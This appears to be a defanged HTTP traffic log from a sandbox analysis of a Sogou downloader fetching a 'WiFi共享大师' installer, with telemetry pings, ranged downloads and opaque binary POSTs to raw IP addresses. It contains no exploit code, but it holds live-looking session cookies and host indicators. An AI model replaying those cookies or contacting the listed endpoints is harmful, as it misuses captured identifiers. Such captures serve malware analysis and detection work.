Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:10 GMT
Content-Type: text/css
Content-Length: 4074
Connection: keep-alive
Last-Modified: Tue, 17 May 2016 07:09:36 GMT
ETag: "573ac3b0-fea"
Expires: Sun, 22 May 2016 07:13:10 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes
GET /softassis/css/ranking.css HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:10 GMT
Content-Type: text/css
Content-Length: 2752
Connection: keep-alive
Last-Modified: Tue, 17 May 2016 07:09:36 GMT
ETag: "573ac3b0-ac0"
Expires: Sun, 22 May 2016 07:13:10 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes
GET /js/jquery-1.11.1.min.js HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:11 GMT
Content-Type: application/x-javascript
Content-Length: 95786
Connection: keep-alive
Last-Modified: Tue, 17 May 2016 07:09:36 GMT
ETag: "573ac3b0-1762a"
Expires: Sun, 22 May 2016 07:13:11 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes
GET /img/recommend-btn.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:13 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: hXXp://xz.sogou.com/error
3f
The URL has moved <a href="hXXp://xz.sogou.com/error">here</a>
0
GET /ie-css3.htc HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:13 GMT
Content-Length: 11952
Connection: keep-alive
ETag: "AVYcdCtTP6x"
Last-Modified: Tue, 17 May 2016 07:16:19 GMT
Accept-Ranges: bytes
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:08 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=102&tasktype=2&pcid=2320808333768086190&downloadtype=software&softname=WiFi共享大师&extension=exe&rand=1463642027 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:47 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=233&bindtype=thirdparty_pcmgr_qb&bindname=QQBrowser&weight=1&scheme=&rand=1463642028 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:48 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=234&bindtype=thirdparty_pcmgr_qb&bindname=QQBrowser&weight=1&scheme=&rand=1463642028 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:49 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=103&tasktype=2&pcid=2320808333768086190&downloadtype=software&softname=WiFi共享大师&extension=exe&rand=1463642029 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:49 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=310&num=1&rand=1463642030 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:50 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
POST / HTTP/1.1
Host: 58.254.134.238:80
Content-type: application/octet-stream
Content-Length: 44
Connection: Keep-Alive
A....... ........r.8.=.n4E....)7 ..l.....7`.
HTTP/1.1 200 OK
Content-Length: 28
Content-Type: application/octet-stream
Connection: Close
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=3869205-4570045
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:06 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=2467523-3168363
Referer: hXXp://112.5.251.214/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:31 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
HEAD /v2/thumb/retype/ext/auto/cls/imagick?appid=200504&url=hXXp://www1.pconline.com.cn/download/zt/2013/ico/pc4848.jpg HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; {D9D54F49-E51C-445e-92F2-1EE3C2313240})
Host: imgstore.cdn.sogou.com
Content-Length: 0
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:12:45 GMT
Content-Type: image/jpeg
Content-Length: 3008
Connection: keep-alive
Last-Modified: Thu, 19 May 2016 07:12:45 GMT
Expires: Fri, 20 May 2016 07:12:45 GMT
Cache-Control: max-age=86400
ETag: 26af685efd16b705eda32b3ecb87e163
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_48_60
X-Yuntu-Trace-Proxy: yf_29_21
POST / HTTP/1.1
Host: 123.129.242.140:80
Content-type: application/octet-stream
Content-Length: 252
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 1020
Content-Type: application/octet-stream
Connection: Close
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=0-
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:20 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=4570046-5971727
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:31 GMT
Content-Type: application/octet-stream
Content-Length: 1401682
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 4570046-5971727/11709528
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=10176774-11578455
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:31 GMT
Content-Type: application/octet-stream
Content-Length: 1401682
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 10176774-11578455/11709528
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5270887-5971727
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:30 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=11326565-11452510
Referer: hXXp://112.5.251.214/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:39 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
HEAD /web/redir.jsp?appdown=1&u=-9C432O39iSuy4v1X8mdGjRXb1ARchpxyTVF7GApCN1tS4L5kaabGHHpARrtteyVXkpO1EM9dsDQreZHL5I5rGNjItwiFZhBlM4pEm_3H9kSlCMAp8imlWvNyRK4fWevzSqGGyR3Ek0.&pcid=2320808333768086190&w=1950&filename=WiFi-2175.exe&extra=9_pconline&downloadtype=software HTTP/1.1
User-Agent: HttpRequest
Host: wap.sogou.com
Content-Length: 0
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
HTTP/1.1 302 Found
Server: nginx
Date: Thu, 19 May 2016 07:13:07 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 140
Connection: keep-alive
Set-Cookie: usid=1IstgWf2O_cQ41s1; path=/; expires=Fri, 19-May-17 07:13:07 GMT; domain=.sogou.com
Set-Cookie: ABTEST=0|1463641987|v1; expires=Sat, 18-Jun-16 07:13:07 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: SUV=004D48F6C2F260DA573D67833DE92580; expires=Wed, 14-May-36 07:13:07 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: hXXp://ftp-fj-p2sp.pconline.com.cn/pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou
Set-Cookie: wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; domain=.sogou.com; path=/; expires=Sun, 19-May-2019 07:13:07 GMT
GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/5632829225944923461.png&r=null HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:18 GMT
Content-Type: image/png
Content-Length: 8510
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 13:27:38 GMT
Expires: Thu, 19 May 2016 13:27:38 GMT
Cache-Control: max-age=86400
ETag: e47f9757865c3d4ac672023a3c8188b9
X-YunTu-Cache: HIT
X-Yuntu-Trace: yf_26_53
X-Yuntu-Trace-Proxy: bjzw_40_33
<<< skipped >>>
GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-3726774318030095000.png&r=null HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:19 GMT
Content-Type: image/png
Content-Length: 12563
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 11:43:11 GMT
Expires: Thu, 19 May 2016 11:43:11 GMT
Cache-Control: max-age=86400
ETag: 3169601c33a2e22251f0eb2993875a23
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_48_60
X-Yuntu-Trace-Proxy: yf_27_101
<<< skipped >>>
GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/4871856506745242874.png&r=null HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:19 GMT
Content-Type: image/png
Content-Length: 24324
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 13:29:26 GMT
Expires: Thu, 19 May 2016 13:29:26 GMT
Cache-Control: max-age=86400
ETag: 8bd7b2a57dd3e8f0f499881386784adf
X-YunTu-Ipt: 0.021000146865845
X-Yuntu-Trace: bjzw_66_108
X-Yuntu-Trace-Proxy: zw_64_27
<<< skipped >>>
GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-3230604409881581210.png&r=null HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:20 GMT
Content-Type: image/png
Content-Length: 22878
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 14:17:44 GMT
Expires: Thu, 19 May 2016 14:17:44 GMT
Cache-Control: max-age=86400
ETag: 828822cd97deaef161e8cfc62faed5a9
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_37_26
X-Yuntu-Trace-Proxy: bjzw_91_49
<<< skipped >>>
GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-7654919934142823378.png&r=null HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:21 GMT
Content-Type: image/png
Content-Length: 28304
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 13:29:13 GMT
Expires: Thu, 19 May 2016 13:29:13 GMT
Cache-Control: max-age=86400
ETag: 3c76a6890a22b2f8b6361bed2bc94d82
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_66_108
X-Yuntu-Trace-Proxy: tc_212_43
<<< skipped >>>
GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-6699374927030488929.png&r=null HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:21 GMT
Content-Type: image/png
Content-Length: 10697
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 13:47:34 GMT
Expires: Thu, 19 May 2016 13:47:34 GMT
Cache-Control: max-age=86400
ETag: 4971efb92950694d5edf95579bd5f322
X-YunTu-Cache: HIT
X-Yuntu-Trace: yf_25_38
X-Yuntu-Trace-Proxy: bjzw_16_121
<<< skipped >>>
GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/2040683535505104749.png&r=null HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:22 GMT
Content-Type: image/png
Content-Length: 73015
Connection: keep-alive
Last-Modified: Thu, 19 May 2016 02:00:22 GMT
Expires: Fri, 20 May 2016 02:00:22 GMT
Cache-Control: max-age=86400
ETag: 305aaf50d0cbf0e79c5edc87d14d0b11
X-YunTu-Cache: HIT
X-Yuntu-Trace: yf_26_53
X-Yuntu-Trace-Proxy: yf_22_56
<<< skipped >>>
GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-3726774318030095000.png&r=null HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:23 GMT
Content-Type: image/png
Content-Length: 12563
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 11:43:11 GMT
Expires: Thu, 19 May 2016 11:43:11 GMT
Cache-Control: max-age=86400
ETag: 3169601c33a2e22251f0eb2993875a23
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_48_60
X-Yuntu-Trace-Proxy: yf_27_101
<<< skipped >>>
GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/8623308865128809051.png&r=null HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:24 GMT
Content-Type: image/png
Content-Length: 15021
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 14:15:22 GMT
Expires: Thu, 19 May 2016 14:15:22 GMT
Cache-Control: max-age=86400
ETag: e8ccdb50a01d8c9e5409c595085bd85f
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_41_59
X-Yuntu-Trace-Proxy: tc_196_98
<<< skipped >>>
GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/1882834511144817344.png&r=null HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:24 GMT
Content-Type: image/png
Content-Length: 21518
Connection: keep-alive
Last-Modified: Thu, 19 May 2016 06:34:31 GMT
Expires: Fri, 20 May 2016 06:34:31 GMT
Cache-Control: max-age=86400
ETag: d37b153bda413229fc007dd3baa327d1
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_56_115
X-Yuntu-Trace-Proxy: tc_192_123
<<< skipped >>>
POST / HTTP/1.1
Host: 123.129.242.154:80
Content-type: application/octet-stream
Content-Length: 252
Connection: Keep-Alive
<...........C.._....K2t......ZWX.jIW.......".L".2r.l}X3 .?K.J.......fM...........k.....6....R..D.A.t[.$.b3D....A .......1.Bu..L!.q.pC.=.K].U\..%....%b....e....w.Z...?..1.l...[<......!.%......\3.G..ZG@$..!....2.....\.....9.^...5.Fz...(..T..]....v4Y
HTTP/1.1 200 OK
Content-Length: 28
Content-Type: application/octet-stream
Connection: Close
<............$......4..@..`#..
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=1065841-1766681
Referer: hXXp://ftp-fj-p2sp.pconline.com.cn/pub/download/201010
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
